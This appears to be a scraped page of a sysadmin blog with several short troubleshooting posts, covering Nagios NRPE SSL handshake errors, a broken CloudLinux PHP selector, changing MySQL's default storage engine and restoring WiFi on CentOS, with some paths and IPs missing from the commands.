handler_name : /tmp/tmpIZkUUJ/540138109343874.mp4_audio.aac – Imported with GPAC 0.4.6-DEV-rev3544
Stream mapping:
Stream #0:0 -> #0:0 (h264 -> mpeg4)
Stream #0:1 -> #0:1 (aac -> libmp3lame)
Press [q] to stop, [?] for help
frame= 1773 fps=182 q=9.1 Lsize= 2725kB time=00:00:59.24 bitrate= 376.8kbits/s
video:1694kB audio:926kB subtitle:0 data:0 global headers:0kB muxing overhead 4.021155%



You are good to go now 🙂


CHECK_NRPE: Error – Could not complete SSL handshake

If you find this error in nagios for a particular server, this means nothing but the nrpe check from nagios server cannot able to complete the service check to client server.

You can check this through command line itself, run the following in nagios server.

# /usr/local/nagios/libexec/check_nrpe -H hostnameORclientserverIP -c check_load
CHECK_NRPE: Error – Could not complete SSL handshake.

You may need to cover different scenarios for this to troubleshoot.

1) Check if the particular check is available in client server (For example, check_load, 3ware_check, mail_count etc)

2) Check if xinetd or nrpe stopped running,otherwise try to restart it.

# /etc/init.d/xinetd restart
# /etc/init.d/nrpe restart

3) Make sure you allowed the nagios IP in /etc/xinetd.d/nrpe if nrpe is running under xinetd,like as getting in netstat result.

# netstat -plan | grep :5666
tcp 0 0* LISTEN 25022/xinetd

Check the parameter “only_from” in this file whether allowed nagios IP there.

Then restart xinetd

# /etc/init.d/xinetd restart


Make sure you allowed the nagios IP in /etc/nagios/nrpe.cfg if nrpe is not running under xinetd and as nrpe user itself, like as getting in netstat result.

# netstat -plan | grep :5666
tcp 0 0* LISTEN 248184/nrpe

Make changes to value of parameter “allowed_hosts” in /etc/nagios/nrpe.cfg to as shown below


Then restart nrpe

# /etc/init.d/nrpe restart

4) Try to whitelist nagios server IP in firewall.


cloudlinux: PHP selector NOT working or BROKEN

It was truly devastating and I was dismayed when I noticed the PHP selector in server got broken or stopped working since the last easy-apache. Tones of tickets were popped in when clients lost their custom php versions and its custom settings

I tried to select the php version 5.4 for the domain and set post_max_size and upload_max_filesize to 32MB each







And I checked by putting a phpinfo page in the domain, sadly the changes I made in php selector settings had no effect








Following is the solution that I could finally find out to fix it … tadaa 🙂

PHP configured as suphp in server
# /usr/local/cpanel/bin/rebuild_phpconf –current
Available handlers: suphp dso fcgi cgi none
PHP4 SAPI: none
PHP5 SAPI: suphp
SUEXEC: enabled
RUID2: not installed

We must check if is present in /opt/suphp/sbin/suphp since it is suphp compiled with lve. In this case Cagefs and PHPSelector can’t work properly. You can check this by searching file /opt/suphp/sbin/suphp . Use strings command to read it since it is a binary file.

# strings /opt/suphp/sbin/suphp | grep lve

Output should be as…

# strings /opt/suphp/sbin/suphp |grep lve
Could not resolve path “

If it is not present, then you need to run:

# /usr/sbin/

Then force update cagefsctl to update alt_php.ini of all individual users in server.

# cagefsctl –force-update

Now see my changes 🙂









This should solve your issue

Proper Method To Change Default Mysql Engine Permanently

Here the mysql engine is set to InnoDB by default and I want to change it to MyISAM for long run. It was the old way setting parameter “skip-innodb” and commenting “innodb_file_per_table=1” in my.cnf file. Additionally we used to execute mysql query “SET storage_engine=MYISAM;”. Now a days, the above changes wont work and perhaps the mysql server doesn’t come back after initiating a restart since the changes made. The proper method is set the variable “default-storage-engine = MyISAM” like my mysql configuration as follows:

<> ~> cat /etc/my.cnf
default-storage-engine = MyISAM
#innodb_force_recovery = 4

Nothing else you need to do 🙂
Now restart mysql server and check the default engine is set to what

<> ~> /etc/init.d/mysql restart
Shutting down MySQL. [ OK ]
Starting MySQL. [ OK ]

mysql> show engines;
| Engine | Support | Comment | Transactions | XA | Savepoints |
| MyISAM | DEFAULT | MyISAM storage engine | NO | NO | NO |
| MRG_MYISAM | YES | Collection of identical MyISAM tables | NO | NO | NO |
| CSV | YES | CSV storage engine | NO | NO | NO |
| BLACKHOLE | YES | /dev/null storage engine (anything you write to it disappears) | NO | NO | NO |
| MEMORY | YES | Hash based, stored in memory, useful for temporary tables | NO | NO | NO |
| PERFORMANCE_SCHEMA | YES | Performance Schema | NO | NO | NO |
| ARCHIVE | YES | Archive storage engine | NO | NO | NO |
| FEDERATED | NO | Federated MySQL storage engine | NULL | NULL | NULL |
| InnoDB | NO | Supports transactions, row-level locking, and foreign keys | NULL | NULL | NULL |
9 rows in set (0.00 sec)

If you want to enable InnoDB as well along with default MyISAM engine, then comment out the variable skip-innodb and remove comment before variable innodb_file_per_table=1

Re-setup and configure the broken WiFi network in RHEL/CentOS/Fedora

Recently I installed CentOS on my VAIO laptop and I had to do some further up-gradation of outdated packages, but that shoved me into a real headache. The WiFi network was working good till starting the upgradation procedure, but stopped right after completing the process. I had no idea then about how this was happened. I was getting only the following information from ifconfig

wlan0 Link encap:Ethernet HWaddr A4:17:31:E0:B6:47
inet6 addr: fe80::a617:31ff:fee0:b647/64 Scope:Link
RX packets:95834 errors:0 dropped:0 overruns:0 frame:0
TX packets:73355 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:119240792 (113.7 MiB) TX bytes:9640456 (9.1 MiB)

and from iwconfig

wlan0 IEEE 802.11bgn ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=16 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off

Sadly no IP Address or anything received from the DSL Modem. I tried to restart network and NetworkManager services and the dhclient as well. But those did not change the situation. I checked /var/log/messages for system messages and dmesg for kernel messages and got the following ones.

Jan 20 12:12:29 john NetworkManager[2042]: error requesting auth for (35) Remote Exception invoking org.freedesktop.PolicyKit1.Authority.CheckAuthorization() on /org/freedesktop/PolicyKit1/Authority at name org.freedesktop.PolicyKit1: org.freedesktop.DBus.Error.Spawn

ADDRCONF(NETDEV_UP): wlan0: link is not ready

It was fully doubtful for me if the wifi device got undetected or lost its driver module itself in running kernel. But it was indeed a relaxation result from lspci and lsmod since the wifi device was already there in place and the running kernel still has the wifi adapter modules kept with it.

<> ~> lspci -v | grep -A 12 Wireless
07:00.0 Network controller: Qualcomm Atheros AR9485 Wireless Network Adapter (rev 01)
Subsystem: Foxconn International, Inc. Device e044
Flags: bus master, fast devsel, latency 0, IRQ 16
Memory at c1200000 (64-bit, non-prefetchable) [size=512K]
Expansion ROM at c1500000 [disabled] [size=64K]
Capabilities: [40] Power Management version 2
Capabilities: [50] MSI: Enable- Count=1/4 Maskable+ 64bit+
Capabilities: [70] Express Endpoint, MSI 00
Capabilities: [100] Advanced Error Reporting
Capabilities: [140] Virtual Channel
Capabilities: [160] Device Serial Number 00-00-00-00-00-00-00-00
Kernel driver in use: ath9k
Kernel modules: ath9k

<> ~> lsmod | grep ath9k
ath9k 91969 0
mac80211 552581 1 ath9k
ath9k_common 3193 1 ath9k
ath9k_hw 408176 2 ath9k,ath9k_common
ath 18078 3 ath9k,ath9k_common,ath9k_hw
cfg80211 619515 3 ath9k,mac80211,ath

Finally I did use the tool iwlist to reestablish the wifi network manually. For that, first install the tool

<> ~> yum -y install wireless-tools

<> ~> ifconfig wlan0 up

<> ~> iwlist wlan0 scan

<> ~> iwlist wlan0 scan
wlan0 Scan completed :
Cell 01 – Address: 1C:7E:E5:0B:D0:E9
Frequency:2.412 GHz (Channel 1)
Quality=33/70 Signal level=-77 dBm
Encryption key:off
Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 18 Mb/s
24 Mb/s; 36 Mb/s; 54 Mb/s
Bit Rates:6 Mb/s; 9 Mb/s; 12 Mb/s; 48 Mb/s
Extra: Last beacon: 92ms ago
IE: Unknown: 0005444C696E6B
IE: Unknown: 010882848B962430486C
IE: Unknown: 030101
IE: Unknown: 2A0100
IE: Unknown: 2F0100
IE: Unknown: 32040C121860
IE: Unknown: 2D1A6C181BFF00000000000000000000000000000000000000000000
IE: Unknown: 3D1601000400000000000000000000000000000000000000
IE: Unknown: DD090010180202F0040000
IE: Unknown: DD180050F2020101800003A4000027A4000042435E0062322F00

Now configure wlan0 with the above information


<> ~> iwconfig wlan0 essid DLink key off

(((ESSID:”DLink” and Encryption key:off in the iwlist scan result)))

Then start the dhcpclient for wlan0

<> ~> dhclient wlan0

You are done 🙂

from dmesg

ADDRCONF(NETDEV_CHANGE): wlan0: link becomes ready

<> ~> ifconfig | grep -A 7 wlan0
wlan0 Link encap:Ethernet HWaddr A4:17:31:E0:B6:47
inet addr: Bcast: Mask:
inet6 addr: fe80::a617:31ff:fee0:b647/64 Scope:Link
RX packets:104499 errors:0 dropped:0 overruns:0 frame:0
TX packets:80783 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:126639447 (120.7 MiB) TX bytes:11239675 (10.7 MiB)

<> ~> iwconfig
wlan0 IEEE 802.11bgn ESSID:”DLink”
Mode:Managed Frequency:2.412 GHz Access Point: 1C:7E:E5:0B:D0:E9
Bit Rate=1 Mb/s Tx-Power=16 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=43/70 Signal level=-67 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:11 Missed beacon:0

If you don’t want to repeat these steps each time when you start the system, then you can set those in a single script file as follows:

<> ~> cat /root/
#This is to bring up wifi at the startup
ifconfig wlan0 up
iwconfig wlan0 essid DLink key off
sleep 5
dhclient wlan0

<> ~> chmod +x /root/

Then set the command sh /root/ in file /etc/rc.local or /etc/rc.d/rc.local inorder to establish wifi network along with all the run levels while system booting process.